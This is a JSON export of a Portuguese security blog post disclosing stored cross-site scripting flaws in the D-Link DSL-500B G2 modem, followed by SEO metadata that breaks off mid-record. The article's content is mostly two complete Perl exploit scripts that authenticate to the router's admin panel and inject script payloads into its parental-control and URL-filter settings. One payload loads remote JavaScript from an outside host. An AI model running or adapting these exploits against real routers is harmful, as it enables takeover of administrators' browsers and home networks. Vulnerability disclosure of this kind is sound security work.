{"id":386,"date":"2016-10-11T10:37:12","date_gmt":"2016-10-11T13:37:12","guid":{"rendered":"http:\/\/www.xlabs.com.br\/blog\/?p=386"},"modified":"2021-08-25T17:52:34","modified_gmt":"2021-08-25T20:52:34","slug":"cve-2015-xxxx-d-link-modem-dsl-500b-gii-xss-injection-stored","status":"publish","type":"post","link":"https:\/\/www.xlabs.com.br\/blog\/cve-2015-xxxx-d-link-modem-dsl-500b-gii-xss-injection-stored\/","title":{"rendered":"Modem D-Link DSL-500B GII XSS Injection Stored"},"content":{"rendered":"\n<p>Ao analisarmos a seguran\u00e7a do modem D-Link DSL-500B Gera\u00e7\u00e3o 2, notamos a presen\u00e7a de algumas vulnerabilidades de Cross Site Scripting, ou mais conhecido como XSS Injection, todas as falhas&nbsp;permitem&nbsp;o modem armazenar&nbsp;c\u00f3digos maliciosos, podendo originar um ataque externo \u00e0 rede da v\u00edtima, neste caso a v\u00edtima mais comum seria o administrador do modem, este \u00e9 um&nbsp;pequeno artigo&nbsp;que tem por objetivo&nbsp;a exposi\u00e7\u00e3o do c\u00f3digo de explora\u00e7\u00e3o &nbsp;destas falhas.<\/p>\n\n\n\n<h4><strong>Descri\u00e7\u00e3o da plataforma segundo o website do fabricante<\/strong><\/h4>\n\n\n\n<p>O DSL-500B G2, Modem banda larga ADSL2+ da D-Link \u00e9 ideal para usu\u00e1rios que obt\u00eam a sua conex\u00e3o \u00e0 Internet atrav\u00e9s da linha telef\u00f4nica. Este roteador conecta-se diretamente \u00e0 linha telef\u00f4nica, sem a necessidade de um modem ADSL. Por tamb\u00e9m ser um roteador, o DSL-500B G2 conecta um grupo de usu\u00e1rios \u00e0 Internet, permitindo que computadores em uma casa ou um escrit\u00f3rio compartilhem uma conex\u00e3o de alta velocidade ADSL 2\/2+. Ele fornece conex\u00e3o via Ethernet para computadores e dispositivos. Possui quatro portas Ethernet, prote\u00e7\u00e3o de firewall e QoS para downloads ou uploads eficientes e seguros de fotos, arquivos de m\u00fasica, v\u00eddeos e e-mail atrav\u00e9s da Internet.<\/p>\n\n\n\n<h4>&nbsp;<\/h4>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"http:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2015\/04\/Tela_inicial.jpg\"><img decoding=\"async\" width=\"463\" height=\"390\" src=\"http:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2015\/04\/Tela_inicial.jpg\" alt=\"\" class=\"wp-image-388\" srcset=\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2015\/04\/Tela_inicial.jpg 463w, https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2015\/04\/Tela_inicial-300x253.jpg 300w\" sizes=\"(max-width: 463px) 100vw, 463px\" \/><\/a><\/figure>\n\n\n\n<h4>&nbsp;<\/h4>\n\n\n\n<h4><strong>A falha de seguran\u00e7a<\/strong><\/h4>\n\n\n\n<p># Software:&nbsp;D-Link DSL-500B Generation 2<br># Vers\u00e3o: BCM 1.1<br># Empresa:&nbsp;D-Link<br># Website: www.dlink.com<br># Vulnerabilidade: M\u00faltiplos Cross Site Scripting Armazenado&nbsp;(XSS Injection Stored)<br># CVE:&nbsp;CVE-2015-XXXX<br># Autor: Mauricio Corr\u00eaa<br># POC: <a href=\"https:\/\/www.youtube.com\/watch?v=Fc_JuZ-uHE4\" target=\"_blank\" rel=\"noopener noreferrer\">Video<\/a><\/p>\n\n\n<iframe  id=\"_ytid_13446\"  width=\"750\" height=\"422\"  data-origwidth=\"750\" data-origheight=\"422\" src=\"https:\/\/www.youtube.com\/embed\/Fc_JuZ-uHE4?enablejsapi=1&autoplay=0&cc_load_policy=0&cc_lang_pref=&iv_load_policy=1&loop=0&modestbranding=0&rel=1&fs=1&playsinline=0&autohide=2&theme=dark&color=red&controls=1&\" class=\"__youtube_prefs__  no-lazyload\" title=\"YouTube player\"  allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen data-no-lazy=\"1\" data-skipgform_ajax_framebjll=\"\"><\/iframe>\n\n\n\n<p><strong>todmngr.tod exploit (Parental Control Configuration Panel)<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-preformatted lang:perl decode:true\">#!\/usr\/bin\/perl\n#\n# Date dd-mm-aaaa: 13-02-2015\n# Exploit for D-Link DSL-500B G2\n# Cross Site Scripting (XSS Injection) Stored in todmngr.tod\n# Developed by Mauricio Corr\u00eaa\n# XLabs Information Security\n# WebSite: www.xlabs.com.br\n#\n# CAUTION!\n# This exploit disables some features of the modem,\n# forcing the administrator of the device, accessing the page to reconfigure the modem again,\n# occurring script execution in the browser of internal network users.\n#\n# Use with caution!\n# Use at your own risk!\n#\n\nuse strict;\nuse warnings;\nuse diagnostics;\nuse LWP::UserAgent;\nuse HTTP::Request;\nuse URI::Escape;\n\n\tmy $ip = $ARGV[0];\n\n\tmy $user = $ARGV[1];\n\n\tmy $pass = $ARGV[2];\n\t\t\n\n\t\tif (@ARGV != 3){\n\n\t\t\tprint \"\\n\";\n\t\t\tprint \"XLabs Information Security www.xlabs.com.br\\n\";\n\t\t\tprint \"Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in todmngr.tod\\n\";\n\t\t\tprint \"Developed by Mauricio Correa\\n\";\n\t\t\tprint \"Contact: mauricio\\@xlabs.com.br\\n\";\n\t\t\tprint \"Usage: perl $0 http:\\\/\\\/host_ip\\\/ user pass\\n\";\n\n\t\t}else{\n\n\t\t\t$ip = $1 if($ip=~\/(.*)\\\/$\/);\n\n\t\t\tprint \"XLabs Information Security www.xlabs.com.br\\n\";\n\t\t\tprint \"Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in todmngr.tod\\n\";\n\t\t\tprint \"Developed by Mauricio Correa\\n\";\n\t\t\tprint \"Contact: mauricio\\@xlabs.com.br\\n\";\n\t\t\tprint \"[+] Exploring $ip\\\/ ...\\n\";\n\n\t\t\tmy $payload = \"%3Cscript%3Ealert%28%27XLabs%27%29%3C%2fscript%3E\";\n\t\t\t\n\t\t\tmy $ua = new LWP::UserAgent;\n\n\t\t\tmy $hdrs = new HTTP::Headers( Accept =&gt; 'text\/plain', UserAgent =&gt; \"XLabs Security Exploit Browser\/1.0\" );\n\n\t\t\t$hdrs-&gt;authorization_basic($user, $pass);\n\t\t\t\n\t\t\tchomp($ip);\n\n\t\t\t\n\t\t\tprint \"[+] Preparing exploit...\\n\";\n\t\t\t\n\t\t\tmy $url_and_xpl = \"$ip\/todmngr.tod?action=add&amp;username=$payload&amp;mac=AA:BB:CC:DD:EE:FF&amp;days=1&amp;start_time=720&amp;end_time=840\";\n\t\t\t\t\t\t\n\t\t\tmy $req = new HTTP::Request(\"GET\",$url_and_xpl,$hdrs);\n\n\t\t\tprint \"[+] Prepared!\\n\";\n\t\t\t\n\t\t\tprint \"[+] Requesting and Exploiting...\\n\";\n\t\t\t\n\t\t\tmy $resp = $ua-&gt;request($req);\n\n\t\t\tif ($resp-&gt;is_success){\n\n\t\t\tprint \"[+] Successfully Requested!\\n\";\n\t\t\t\n\t\t\t\n\t\t\t\tmy $url = \"$ip\/todmngr.tod?action=view\";\n\t\t\t\n\t\t\t\t$req = new HTTP::Request(\"GET\",$url,$hdrs);\n\n\t\t\t\tprint \"[+] Checking that was explored...\\n\";\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tmy $resp2 = $ua-&gt;request($req);\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tif ($resp2-&gt;is_success){\n\n\t\t\t\tmy $resultado = $resp2-&gt;as_string;\n\t\t\t\t\n\t\t\t\t\t\t\tif(index($resultado, uri_unescape($payload)) != -1){\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tprint \"[+] Successfully Exploited!\";\n\n\t\t\t\t\t\t\t}else{\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tprint \"[-] Not Exploited!\";\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t}else {\n\n\t\t\tprint \"[-] Ops!\\n\";\n\t\t\tprint $resp-&gt;message;\n\n\t\t\t}\n\n\n}\n\n<\/pre>\n\n\n\n<p>Exploit na configura\u00e7\u00e3o URL Filter,<\/p>\n\n\n\n<p><strong>URL Filter exploit (URL Filter Configuration Panel)<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-preformatted lang:perl decode:true\">#!\/usr\/bin\/perl\n#\n# Date dd-mm-aaaa: 13-02-2015\n# Exploit for D-Link DSL-500B G2\n# Cross Site Scripting (XSS Injection) Stored in todmngr.tod URL Filter\n# Developed by Mauricio Corr\u00eaa\n# XLabs Information Security\n# WebSite: www.xlabs.com.br\n#\n# CAUTION!\n# This exploit disables some features of the modem,\n# forcing the administrator of the device, accessing the page to reconfigure the modem again,\n# occurring script execution in the browser of internal network users.\n#\n# Use with caution!\n# Use at your own risk!\n#\n\nuse strict;\nuse warnings;\nuse diagnostics;\nuse LWP::UserAgent;\nuse HTTP::Request;\nuse URI::Escape;\n\n\tmy $ip = $ARGV[0];\n\n\tmy $user = $ARGV[1];\n\n\tmy $pass = $ARGV[2];\n\t\t\n\n\t\tif (@ARGV != 3){\n\n\t\t\tprint \"\\n\";\n\t\t\tprint \"XLabs Information Security www.xlabs.com.br\\n\";\n\t\t\tprint \"Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in URL Filter\\n\";\n\t\t\tprint \"Developed by Mauricio Correa\\n\";\n\t\t\tprint \"Contact: mauricio\\@xlabs.com.br\\n\";\n\t\t\tprint \"Usage: perl $0 http:\\\/\\\/host_ip\\\/ user pass\\n\";\n\n\t\t}else{\n\n\t\t\t$ip = $1 if($ip=~\/(.*)\\\/$\/);\n\n\t\t\tprint \"XLabs Information Security www.xlabs.com.br\\n\";\n\t\t\tprint \"Exploit for POC D-Link DSL-500B G2 Stored XSS Injection in URL Filter\\n\";\n\t\t\tprint \"Developed by Mauricio Correa\\n\";\n\t\t\tprint \"Contact: mauricio\\@xlabs.com.br\\n\";\n\t\t\tprint \"[+] Exploring $ip\\\/ ...\\n\";\n\n\t\t\tmy $payload = \"%3Cscript%20src%3D%27%2f%2fxlabs.com.br%2fxssi.js%27%3E%3C%2fscript%3E\";\n\t\t\t\n\t\t\tmy $ua = new LWP::UserAgent;\n\n\t\t\tmy $hdrs = new HTTP::Headers( Accept =&gt; 'text\/plain', UserAgent =&gt; \"XLabs Security Exploit Browser\/1.0\" );\n\n\t\t\t$hdrs-&gt;authorization_basic($user, $pass);\n\t\t\t\n\t\t\tchomp($ip);\n\n\t\t\t\n\t\t\tprint \"[+] Preparing exploit...\\n\";\n\t\t\t\n\t\t\tmy $url_and_xpl = \"$ip\/todmngr.tod?action=set_url&amp;TodUrlAdd=GameOver$payload&amp;port_num=1234\";\n\t\t\t\t\t\t\n\t\t\tmy $req = new HTTP::Request(\"GET\",$url_and_xpl,$hdrs);\n\n\t\t\tprint \"[+] Prepared!\\n\";\n\t\t\t\n\t\t\tprint \"[+] Requesting and Exploiting...\\n\";\n\t\t\t\n\t\t\tmy $resp = $ua-&gt;request($req);\n\n\t\t\tif ($resp-&gt;is_success){\n\n\t\t\tprint \"[+] Successfully Requested!\\n\";\n\t\t\t\n\t\t\t\n\t\t\t\tmy $url = \"$ip\/todmngr.tod?action=urlview\";\n\t\t\t\n\t\t\t\t$req = new HTTP::Request(\"GET\",$url,$hdrs);\n\n\t\t\t\tprint \"[+] Checking that was explored...\\n\";\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tmy $resp2 = $ua-&gt;request($req);\n\t\t\t\t\n\t\t\t\t\n\t\t\t\tif ($resp2-&gt;is_success){\n\n\t\t\t\tmy $resultado = $resp2-&gt;as_string;\n\t\t\t\t\n\t\t\t\t\t\t\tif(index($resultado, uri_unescape($payload)) != -1){\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tprint \"[+] Successfully Exploited!\";\n\n\t\t\t\t\t\t\t}else{\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tprint \"[-] Not Exploited!\";\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t}else {\n\n\t\t\t\tprint \"[-] Ops!\\n\";\n\t\t\t\tprint $resp-&gt;message;\n\n\t\t\t}\n\n\n}\n\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Ao analisarmos a seguran\u00e7a do modem D-Link DSL-500B Gera\u00e7\u00e3o 2, notamos a presen\u00e7a de algumas vulnerabilidades de Cross Site Scripting, ou mais conhecido como XSS Injection, todas as falhas&nbsp;permitem&nbsp;o modem armazenar&nbsp;c\u00f3digos maliciosos, podendo originar um ataque externo \u00e0 rede da v\u00edtima, neste caso a v\u00edtima mais comum seria o administrador do modem, este \u00e9 um&nbsp;pequeno [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1624,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[61],"tags":[42,88,92,91,41],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.0 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Modem D-Link DSL-500B GII XSS Injection Stored &ndash; XLabs Security Blog<\/title>\n<meta name=\"description\" content=\"Ao analisarmos a seguran\u00e7a do modem D-Link DSL-500B Gera\u00e7\u00e3o 2, notamos a presen\u00e7a de algumas vulnerabilidades de XSS Injection...\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.xlabs.com.br\/blog\/cve-2015-xxxx-d-link-modem-dsl-500b-gii-xss-injection-stored\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Modem D-Link DSL-500B GII XSS Injection Stored &ndash; XLabs Security Blog\" \/>\n<meta property=\"og:description\" content=\"Ao analisarmos a seguran\u00e7a do modem D-Link DSL-500B Gera\u00e7\u00e3o 2, notamos a presen\u00e7a de algumas vulnerabilidades de Cross Site Scripting, ou mais conhecido como XSS Injection, todas as falhas\u00a0permitem\u00a0o modem armazenar\u00a0c\u00f3digos maliciosos, podendo originar um ataque externo \u00e0 rede da v\u00edtima, neste caso a v\u00edtima mais comum seria o administrador do modem, este \u00e9 um\u00a0pequeno artigo\u00a0que tem por objetivo\u00a0a exposi\u00e7\u00e3o do c\u00f3digo de explora\u00e7\u00e3o \u00a0destas falhas.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.xlabs.com.br\/blog\/cve-2015-xxxx-d-link-modem-dsl-500b-gii-xss-injection-stored\/\" \/>\n<meta property=\"og:site_name\" content=\"XLabs Security Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/xlabs\" \/>\n<meta property=\"article:published_time\" content=\"2016-10-11T13:37:12+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-08-25T20:52:34+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2016\/10\/modem-d-link-dsl-500b-GII-xss-injection-stored-blog-post-xlabs.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1000\" \/>\n\t<meta property=\"og:image:height\" content=\"488\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Mauricio Corr\u00eaa\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:title\" content=\"Modem D-Link DSL-500B GII XSS Injection Stored &ndash; XLabs Security Blog\" \/>\n<meta name=\"twitter:description\" content=\"Ao analisarmos a seguran\u00e7a do modem D-Link DSL-500B Gera\u00e7\u00e3o 2, notamos a presen\u00e7a de algumas vulnerabilidades de Cross Site Scripting, ou mais conhecido como XSS Injection, todas as falhas\u00a0permitem\u00a0o modem armazenar\u00a0c\u00f3digos maliciosos, podendo originar um ataque externo \u00e0 rede da v\u00edtima, neste caso a v\u00edtima mais comum seria o administrador do modem, este \u00e9 um\u00a0pequeno artigo\u00a0que tem por objetivo\u00a0a exposi\u00e7\u00e3o do c\u00f3digo de explora\u00e7\u00e3o \u00a0destas falhas.\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2016\/10\/modem-d-link-dsl-500b-GII-xss-injection-stored-blog-post-xlabs.png\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Mauricio Corr\u00eaa\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/cve-2015-xxxx-d-link-modem-dsl-500b-gii-xss-injection-stored\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/cve-2015-xxxx-d-link-modem-dsl-500b-gii-xss-injection-stored\/\"},\"author\":{\"name\":\"Mauricio Corr\u00eaa\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/7d0839d8f5b967c3daa45aa01f3fdd3d\"},\"headline\":\"Modem D-Link DSL-500B GII XSS Injection Stored\",\"datePublished\":\"2016-10-11T13:37:12+00:00\",\"dateModified\":\"2021-08-25T20:52:34+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/cve-2015-xxxx-d-link-modem-dsl-500b-gii-xss-injection-stored\/\"},\"wordCount\":295,\"publisher\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#organization\"},\"keywords\":[\"Cross Site Scripting\",\"D-Link\",\"DSL-500B Generation 2\",\"DSL-500BII\",\"XSS Injection\"],\"articleSection\":[\"Falhas de Seguran\u00e7a\"],\"inLanguage\":\"pt-BR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/cve-2015-xxxx-d-link-modem-dsl-500b-gii-xss-injection-stored\/\",\"url\":\"https:\/\/www.xlabs.com.br\/blog\/cve-2015-xxxx-d-link-modem-dsl-500b-gii-xss-injection-stored\/\",\"name\":\"Modem D-Link DSL-500B GII XSS Injection Stored &ndash; XLabs Security Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#website\"},\"datePublished\":\"2016-10-11T13:37:12+00:00\",\"dateModified\":\"2021-08-25T20:52:34+00:00\",\"description\":\"Ao analisarmos a seguran\u00e7a do modem D-Link DSL-500B Gera\u00e7\u00e3o 2, notamos a presen\u00e7a de algumas vulnerabilidades de XSS Injection...\",\"breadcrumb\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/cve-2015-xxxx-d-link-modem-dsl-500b-gii-xss-injection-stored\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.xlabs.com.br\/blog\/cve-2015-xxxx-d-link-modem-dsl-500b-gii-xss-injection-stored\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/cve-2015-xxxx-d-link-modem-dsl-500b-gii-xss-injection-stored\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/www.xlabs.com.br\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Modem D-Link DSL-500B GII XSS Injection Stored\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#website\",\"url\":\"https:\/\/www.xlabs.com.br\/blog\/\",\"name\":\"XLabs Security Blog\",\"description\":\"Seguran\u00e7a da Informa\u00e7\u00e3o\",\"publisher\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.xlabs.com.br\/blog\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#organization\",\"name\":\"XLabs Security\",\"url\":\"https:\/\/www.xlabs.com.br\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2020\/11\/Logotipo.png\",\"contentUrl\":\"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2020\/11\/Logotipo.png\",\"width\":478,\"height\":168,\"caption\":\"XLabs Security\"},\"image\":{\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.instagram.com\/xlabs.security\",\"https:\/\/www.linkedin.com\/company\/xlabs-security\/\",\"https:\/\/www.youtube.com\/channel\/UCPbGDmCQI7_UcAPmvVLi58g?view_as=subscriber\",\"https:\/\/www.facebook.com\/xlabs\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/7d0839d8f5b967c3daa45aa01f3fdd3d\",\"name\":\"Mauricio Corr\u00eaa\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/f0734e5fb6afc04d038e66cae478a8a0?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/f0734e5fb6afc04d038e66cae478a8a0?s=96&d=mm&r=g\",\"caption\":\"Mauricio Corr\u00eaa\"},\"url\":\"https:\/\/www.xlabs.com.br\/blog\/author\/mauricio-correa\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Modem D-Link DSL-500B GII XSS Injection Stored &ndash; XLabs Security Blog","description":"Ao analisarmos a seguran\u00e7a do modem D-Link DSL-500B Gera\u00e7\u00e3o 2, notamos a presen\u00e7a de algumas vulnerabilidades de XSS Injection...","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.xlabs.com.br\/blog\/cve-2015-xxxx-d-link-modem-dsl-500b-gii-xss-injection-stored\/","og_locale":"pt_BR","og_type":"article","og_title":"Modem D-Link DSL-500B GII XSS Injection Stored &ndash; XLabs Security Blog","og_description":"Ao analisarmos a seguran\u00e7a do modem D-Link DSL-500B Gera\u00e7\u00e3o 2, notamos a presen\u00e7a de algumas vulnerabilidades de Cross Site Scripting, ou mais conhecido como XSS Injection, todas as falhas\u00a0permitem\u00a0o modem armazenar\u00a0c\u00f3digos maliciosos, podendo originar um ataque externo \u00e0 rede da v\u00edtima, neste caso a v\u00edtima mais comum seria o administrador do modem, este \u00e9 um\u00a0pequeno artigo\u00a0que tem por objetivo\u00a0a exposi\u00e7\u00e3o do c\u00f3digo de explora\u00e7\u00e3o \u00a0destas falhas.","og_url":"https:\/\/www.xlabs.com.br\/blog\/cve-2015-xxxx-d-link-modem-dsl-500b-gii-xss-injection-stored\/","og_site_name":"XLabs Security Blog","article_publisher":"https:\/\/www.facebook.com\/xlabs","article_published_time":"2016-10-11T13:37:12+00:00","article_modified_time":"2021-08-25T20:52:34+00:00","og_image":[{"width":1000,"height":488,"url":"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2016\/10\/modem-d-link-dsl-500b-GII-xss-injection-stored-blog-post-xlabs.png","type":"image\/png"}],"author":"Mauricio Corr\u00eaa","twitter_card":"summary_large_image","twitter_title":"Modem D-Link DSL-500B GII XSS Injection Stored &ndash; XLabs Security Blog","twitter_description":"Ao analisarmos a seguran\u00e7a do modem D-Link DSL-500B Gera\u00e7\u00e3o 2, notamos a presen\u00e7a de algumas vulnerabilidades de Cross Site Scripting, ou mais conhecido como XSS Injection, todas as falhas\u00a0permitem\u00a0o modem armazenar\u00a0c\u00f3digos maliciosos, podendo originar um ataque externo \u00e0 rede da v\u00edtima, neste caso a v\u00edtima mais comum seria o administrador do modem, este \u00e9 um\u00a0pequeno artigo\u00a0que tem por objetivo\u00a0a exposi\u00e7\u00e3o do c\u00f3digo de explora\u00e7\u00e3o \u00a0destas falhas.","twitter_image":"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2016\/10\/modem-d-link-dsl-500b-GII-xss-injection-stored-blog-post-xlabs.png","twitter_misc":{"Escrito por":"Mauricio Corr\u00eaa","Est. tempo de leitura":"4 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.xlabs.com.br\/blog\/cve-2015-xxxx-d-link-modem-dsl-500b-gii-xss-injection-stored\/#article","isPartOf":{"@id":"https:\/\/www.xlabs.com.br\/blog\/cve-2015-xxxx-d-link-modem-dsl-500b-gii-xss-injection-stored\/"},"author":{"name":"Mauricio Corr\u00eaa","@id":"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/7d0839d8f5b967c3daa45aa01f3fdd3d"},"headline":"Modem D-Link DSL-500B GII XSS Injection Stored","datePublished":"2016-10-11T13:37:12+00:00","dateModified":"2021-08-25T20:52:34+00:00","mainEntityOfPage":{"@id":"https:\/\/www.xlabs.com.br\/blog\/cve-2015-xxxx-d-link-modem-dsl-500b-gii-xss-injection-stored\/"},"wordCount":295,"publisher":{"@id":"https:\/\/www.xlabs.com.br\/blog\/#organization"},"keywords":["Cross Site Scripting","D-Link","DSL-500B Generation 2","DSL-500BII","XSS Injection"],"articleSection":["Falhas de Seguran\u00e7a"],"inLanguage":"pt-BR"},{"@type":"WebPage","@id":"https:\/\/www.xlabs.com.br\/blog\/cve-2015-xxxx-d-link-modem-dsl-500b-gii-xss-injection-stored\/","url":"https:\/\/www.xlabs.com.br\/blog\/cve-2015-xxxx-d-link-modem-dsl-500b-gii-xss-injection-stored\/","name":"Modem D-Link DSL-500B GII XSS Injection Stored &ndash; XLabs Security Blog","isPartOf":{"@id":"https:\/\/www.xlabs.com.br\/blog\/#website"},"datePublished":"2016-10-11T13:37:12+00:00","dateModified":"2021-08-25T20:52:34+00:00","description":"Ao analisarmos a seguran\u00e7a do modem D-Link DSL-500B Gera\u00e7\u00e3o 2, notamos a presen\u00e7a de algumas vulnerabilidades de XSS Injection...","breadcrumb":{"@id":"https:\/\/www.xlabs.com.br\/blog\/cve-2015-xxxx-d-link-modem-dsl-500b-gii-xss-injection-stored\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.xlabs.com.br\/blog\/cve-2015-xxxx-d-link-modem-dsl-500b-gii-xss-injection-stored\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.xlabs.com.br\/blog\/cve-2015-xxxx-d-link-modem-dsl-500b-gii-xss-injection-stored\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/www.xlabs.com.br\/blog\/"},{"@type":"ListItem","position":2,"name":"Modem D-Link DSL-500B GII XSS Injection Stored"}]},{"@type":"WebSite","@id":"https:\/\/www.xlabs.com.br\/blog\/#website","url":"https:\/\/www.xlabs.com.br\/blog\/","name":"XLabs Security Blog","description":"Seguran\u00e7a da Informa\u00e7\u00e3o","publisher":{"@id":"https:\/\/www.xlabs.com.br\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.xlabs.com.br\/blog\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/www.xlabs.com.br\/blog\/#organization","name":"XLabs Security","url":"https:\/\/www.xlabs.com.br\/blog\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2020\/11\/Logotipo.png","contentUrl":"https:\/\/www.xlabs.com.br\/blog\/wp-content\/uploads\/2020\/11\/Logotipo.png","width":478,"height":168,"caption":"XLabs Security"},"image":{"@id":"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.instagram.com\/xlabs.security","https:\/\/www.linkedin.com\/company\/xlabs-security\/","https:\/\/www.youtube.com\/channel\/UCPbGDmCQI7_UcAPmvVLi58g?view_as=subscriber","https:\/\/www.facebook.com\/xlabs"]},{"@type":"Person","@id":"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/7d0839d8f5b967c3daa45aa01f3fdd3d","name":"Mauricio Corr\u00eaa","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/www.xlabs.com.br\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/f0734e5fb6afc04d038e66cae478a8a0?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f0734e5fb6afc04d038e66cae478a8a0?s=96&d=mm&r=g","caption":"Mauricio 